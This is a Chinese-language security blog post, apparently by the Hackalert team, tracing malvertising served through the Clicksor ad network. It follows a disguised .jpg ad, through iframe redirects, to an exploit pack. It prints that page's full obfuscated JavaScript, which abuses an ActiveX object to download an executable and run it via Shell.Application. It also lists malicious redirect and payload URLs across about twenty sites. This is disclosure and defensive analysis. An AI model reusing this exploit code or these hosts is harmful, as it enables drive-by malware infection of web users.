超過一半以上的惡意廣告來自Clicksor

(Credits: Chris Hsiao, NightCola Lin, Wayne Huang)

最近，我們的Hackalert偵測到大量的惡意廣告(Malvertising)，其中有一半以上是來自廣告商-Clicksor。

分析:
這邊我們只挑了其中一個來做分析說明。這邊有完整的記錄檔可供下載,其感染路徑如下:

1. 受害網站:

http://mytingoo.com/

2. 包含的Clicksor廣告連結:

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=164907&adtype=1&sid=252118&zone=17836"></script>

3. 載入廣告的內容片斷:

<script type="text/javascript" src="http://pub.clicksor.net/newServing/js/banner.js"></script></head><body><div id="tip"><span>Tooltips</span></div><div id="ad_block"><ul><li><ol><li class="rich" style="width:728px;height:90px;" id="ad0" ><iframe src=http://anexsecurity.com/pub_ben/728x90.jpg width='728' height='90' frameborder='0' scrolling='no' marginheight=0 marginwidth=0></iframe><img border="0" width="1" height="1" alt="roi px" src="http://serw.clicksor.com/newServing/roitrack.php?cluid=1092-1-186469-30-94296-57-1304418113354-1304418118-1034384353-281945&nid=1&type=Other&value=-1&adsid=51" /></li></ol></li></ul></div><!-- generated in 0.017482995986938s. --></body></html>

4. 其中http://anexsecurity.com/pub_ben/728x90.jpg為被插入的惡意廣告，它偽裝成一個圖形檔，事際上它是一個html，會載入一個真正的jpg檔，同時產生一個iframe來導到惡意的重導連結。其內容如下:

<a href='http://anexsecurity.com/' target='_parent'><img src='http://anexsecurity.com/banners/728x90.jpg'  border=0></a><iframe src='http://yobi3sol.in/bcounter.php?u=ben' width='46' height='51' frameborder='0' scrolling='no'></iframe>

5. 接下來http://yobi3sol.in/bcounter.php?u=ben會進行兩次的重導動作，內容如下:

<iframe width='34' height='44' frameborder='0' scrolling='no' src='http://iban6duo.in/ts/in.cgi?ben'></iframe>

6. http://iban6duo.in/ts/in.cgi?ben內容如下:

<html><head><meta http-equiv="REFRESH" content="1; URL='http://set.obamawebsites.com/news/1992'"></head><body>document moved <a href="http://set.obamawebsites.com/news/1992">here</a></body></html>

7. 最後重導到惡意的exploit pack連結http://set.obamawebsites.com/news/1992(它會根據你browser的版本環境產生相對應的exploit)，內容如下:

<html>jowls velum loo carders ut feet sixmos showily tansy.<body>ret too wyn trues field migg pot cyclers bionts wud begs vein atelic pe wops showily kea. Keet yowe swoon topic collar wo mess relief. Fil favas yarns firm robbed. Taiga velum slew shoal shiver ays at hanting dug carders yatter ed slims an.wires but kea cark dottel ink field relief od ged migg shiver sixmos tophs jowls too blond hided.bionts deaf bine inbred hanting ink harpies ben pot loop.dottel wud but yo at firm.<script>function much(week, simple, little){this.island=30769;this.island+=236;so=20385;so++;this.find=25361;this.find+=76;red=29297;red++;var other={hold:23009};var never="";useVowel={};this.dog=1417;this.dog++;for(var wonder=0; wonder < week.length; wonder++){var plant=simple.indexOf(week.charAt(wonder));simpleIf=["coursePlain","four"];noun=["river","objectUp"];mark=27117;mark++;even=["noteTheir","took","any"];this.pound="pound";if(plant > -1 ){never += little.charAt(plant);}}return never;};function windMe(){this.tell=false;this.music=22597;this.music+=144;place=["thoughBusy","an","plan"];var such = document.createElement(new String("objectdIph".substr(0,6)));var rock = String(".//..//"+"iexplor"+"e.exe");var teach=["wantPoint","rule","wood"];their=7813;their++;var earth=false;what=["haveRan","field"];;try {} catch(realKnow){};might=[];such.setAttribute("id", such);var stepDark=2303;better={force:"walk"};still=24187;still-=254;weStreet={got:"orAgain"};such.setAttribute(new String("classid"), "cls"+"id:"+"BD9nzC".substr(0,3)+"6C5"+"56-"+"65A7Y4G".substr(0,3)+"3-1"+"1D0"+"-98sESy".substr(0,3)+"3A-E9Q".substr(0,3)+"00C"+"h5K04FK5h".substr(3,3)+"C29jPF".substr(0,3)+"KzSgE36SzKg".substr(4,3));try {var you=String("CreateOMLv".substr(0,7)+"4l2kbjectlk42".substr(4,5));this.few=20943;this.few-=226;more=11149;more++;var tookState=["doName","old"];this.must="";var back = such[you]("msxml2.SQbZ".substr(0,7)+"XMLHTTPe2x".substr(0,7), "");var friend = such[you](new String("adodb.strea"+"m"), "");var up = such[you](new String("Shel1ndW".substr(0,4)+"l.Ap"+"ZWYjplicWYjZ".substr(4,4)+"atioW8C".substr(0,4)+"n9Yk".substr(0,1)), "");var had=false;try {back.open(String("GET"), much("FYYzK//SiY_9qPtP4iqSQYiS_#9tK0o/Ni4S/i=j6Pa#qVaH#qa:joj0niHoZPP0Z=jnH_zFz;YFUiPVvQVC6x=Cnja::o0xY9zQ#vQVCaZZ6x", "oa6jn:HO0ZPq#Vi=5FQBGItN9z&USY.p4kR?wWAlXfJ32d7yc1buDrgE%sM-8e/_KvL;xChTm","0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#;"), false);back.send();friend.type = 1;friend.open();friend.Write(back.responseBody);friend["Save"+"ToFi"+"le"](rock, 2);friend.Close();} catch (e) {move();}try {up["she"+"llegwzW".substr(0,3)+"xec"+"fnxKutenKxf".substr(4,3)](rock);} catch (e) {move();}} catch (e) {move();}move();}function move(){var d=document, prefix="<meta http-equiv='refresh'"; d.write(prefix + " content='0; url=?topic_id=1992&thread_id=2&f=4315508&i=i&action=6.0&t=m&c=k&x=157&start=MSIE'>");}var under=0;var also=false;function a(){while(under++ < 122){a();}if(!also){also = true;windMe();}}a();</script>sixmo hanting dug kea migg cambric scenic.cowbird inbred showily trauma at keet.</body></html>

8. exploit打成功後，所下載的Malware(exe file)連結

http://set.obamawebsites.com/news/ef32a1cbd16cb1530384e609aa89f346.php?thread_id=2&f=4315508&topic_id=1992&

特性:

a. 不易被偵測:
b. 存活時間長: 超過三個月以上
c. 影響範圍廣: 同時超過20000個網站立即受影響


由於廣告本身會以區域性來載入不一樣的廣告，每個地區所看到的廣告也都可能不一樣，而且是以輪動的方式輪流載入每則廣告，因此並不會每一次都會載入到惡意那一則廣告。由於這個特性也讓偵測上變得較為不容易。

這邊我們隨機列出了20個被Hackalert偵測到含有惡意Clicksor廣告的網站列表，其中包括受影響的網站網址、所含
的Clicksor廣告連結、所下載的惡意軟體連結以及Google safe-browsing的測偵報告。

1. http://fulldowns.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=101949&adtype=2&sid=179908&zone=17914"></script>

http://payments.cavatars.mobi/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=55210399&forum_id=1991&

2. http://benefitslifeinsurance.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=173387&adtype=1&sid=276044&zone=24445"></script>

http://new.shelfstyles.com/news/8f9ed1204515e67963d9cacaf29c1721.php?start=2&thread_id=55436582&forum_id=1991&

3. http://yoursbuzz.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=54913&adtype=8&sid=126026"></script>

http://name.srikantanraghavan.com/news/c73790e424f82f37dafca43d22bcd969.php?start=2&thread_id=55877751&forum_id=1991&

4. http://download3gpvideo.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=96186&adtype=1&sid=141705"></script>

http://grand.atlantahomevaluesnow.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=56082781&forum_id=1992&

5. http://toreal.blogs.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=178920&adtype=2&sid=279105&zone=25280"></script>

http://articles.ez2avoidforeclosures.info/news/91470a9da1e0ca5417d64d9b516fe0b9.php?start=2&thread_id=56415659&forum_id=1991&

6. http://disgracefulandsexy.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?pid=41866&adtype=1&sid=109599&zone=1625"></script>

http://journals.davedavisquarterhorses.com/news/91470a9da1e0ca5417d64d9b516fe0b9.php?start=2&thread_id=56529138&forum_id=1992&

7. http://paraparapu.info/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=93575&adtype=1&sid=186469"></script>

http://trip.completehorsefeed.com/news/23fb2f31ed03d9f164c871906669e048.php?start=2&thread_id=56702901&forum_id=1992&

8. http://eatmanga.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=131447&adtype=1&sid=196587&zone=8781"></script>

http://tracks.fresnobabies.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=2336475&forum_id=1992&

9. http://bored-space.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=89473&adtype=5&sid=131655"></script>

http://dao.ez2avoidforeclosures.net/news/23fb2f31ed03d9f164c871906669e048.php?start=2&thread_id=57645591&forum_id=1991&

10. http://animekyun.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=59792&adtype=5&sid=274074&zone=23946"></script>

http://cash.ez2avoidforeclosures.org/news/8f9ed1204515e67963d9cacaf29c1721.php?start=2&thread_id=57957716&forum_id=1991&

11. http://freemediatv.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=154793&adtype=1&sid=233437"></script>

http://cash.ez2avoidforeclosures.org/news/23fb2f31ed03d9f164c871906669e048.php?start=2&thread_id=57999481&forum_id=1991&

12. http://sexgamefun.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?pid=64605&adtype=&sid=89809&zone="></script>

http://vvvvvv.dyndns-mail.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=3271149&forum_id=1997&

13. http://ourglocal.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=121355&adtype=1&sid=182046"></script>

http://tracks.fresnobabies.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=3336736&forum_id=1992&

14. http://amfmph.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=98092&adtype=1&sid=160896"></script>

http://service.obamawebsites.com/news/c73790e424f82f37dafca43d22bcd969.php?start=2&thread_id=3761681&forum_id=1992&

15. http://newhmusic.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=169111&adtype=5&sid=259771&zone=19713"></script>

http://set.obamawebsites.com/news/8f9ed1204515e67963d9cacaf29c1721.php?thread_id=2&f=4271699&topic_id=1992&

16. http://mytingoo.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=164907&adtype=1&sid=252118&zone=17836"></script>

http://set.obamawebsites.com/news/c73790e424f82f37dafca43d22bcd969.php?thread_id=2&f=4301478&topic_id=1992&

17. http://op3l.us/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=148633&adtype=1&sid=222364&float=1"></script>

http://s0s.shafranconstruction.com/news/91470a9da1e0ca5417d64d9b516fe0b9.php?thread_id=2&f=4736600&topic_id=1992&

18. http://chandan.org/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=107976&adtype=5&sid=161671"></script>

http://set.gambulingwebsites.com/news/23fb2f31ed03d9f164c871906669e048.php?thread_id=2&f=4765006&topic_id=1994&

19. http://thedirectdownload.blogspot.com/ Google SafeBrowsing

<script src="http://ads.clicksor.com/showAd.php?pid=107464&adtype=5&sid=160535&zone=" type="text/javascript"></script>

http://set.gambulingwebsites.com/news/aeea8469e09d31020332ac926f183eaa.php?thread_id=2&f=5090485&topic_id=1994&

20. http://upload3r.net/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=166255&adtype=2&sid=254502&zone=18385"></script>

http://forum.moonrocksporthorses.com/news/91470a9da1e0ca5417d64d9b516fe0b9.php?thread_id=2&f=5196921&topic_id=1994&

在這20個網站中只有2個網站(約10%)被Google safe-browsing偵測到為惡意，其它皆未列入可疑網站，可見在偵測上有其難度。

事實上，我們的Hackalert在今年1/25就偵測到類似的案例，應該也是同一個人所為，只不過他當時用的是另一則廣告圖，但是手法幾乎一模一樣，一般來說這些惡意的連結頂多存活個1~2個星期就很了不起了。而這個案例的是從1/25算起，已經超過三個月了，到現在它依然還在運作，

以下為當時的感染路徑:

1. http://ultimate-board.com/ (受影響的網站)

2. http://ads.clicksor.com/showAd.php?nid=1&pid=161822&adtype=2&sid=246482 (不一定能再載入到下列這則惡意廣告)

3. http://personnelagency.org/pub_ben/728x90.jpg (這是一個偽裝的圖檔，事實上是一個html，內容如下)

<a href="http://personnelagency.org/" target="_parent"><img src="http://personnelagency.org/banners/768x90.gif"  border=0></a><iframe src='http://2trotlug.in/bcounter.php?u=ben' width='46' height='51' frameborder='0' scrolling='no'></iframe>

4. http://2trotlug.in/bcounter.php?u=ben

<iframe width='34' height='44' frameborder='0' scrolling='no' src='http://goodpersonnecounter.com/ts/in.cgi?ben'></iframe>

5. Exploit URL:

http://goodpersonnecounter.com/ts/in.cgi?ben

6. Dropped Binary:

http://194.247.58.50/dlf.php?i=15

另外根據我們在Alexa Top一百萬大網站的統計中，Clicksor的用戶約佔2%以上，也就是同時會有超20,000個網站受到影響，只要有瀏覽過包含Clicksor廣告的網站，都有可能受到感染。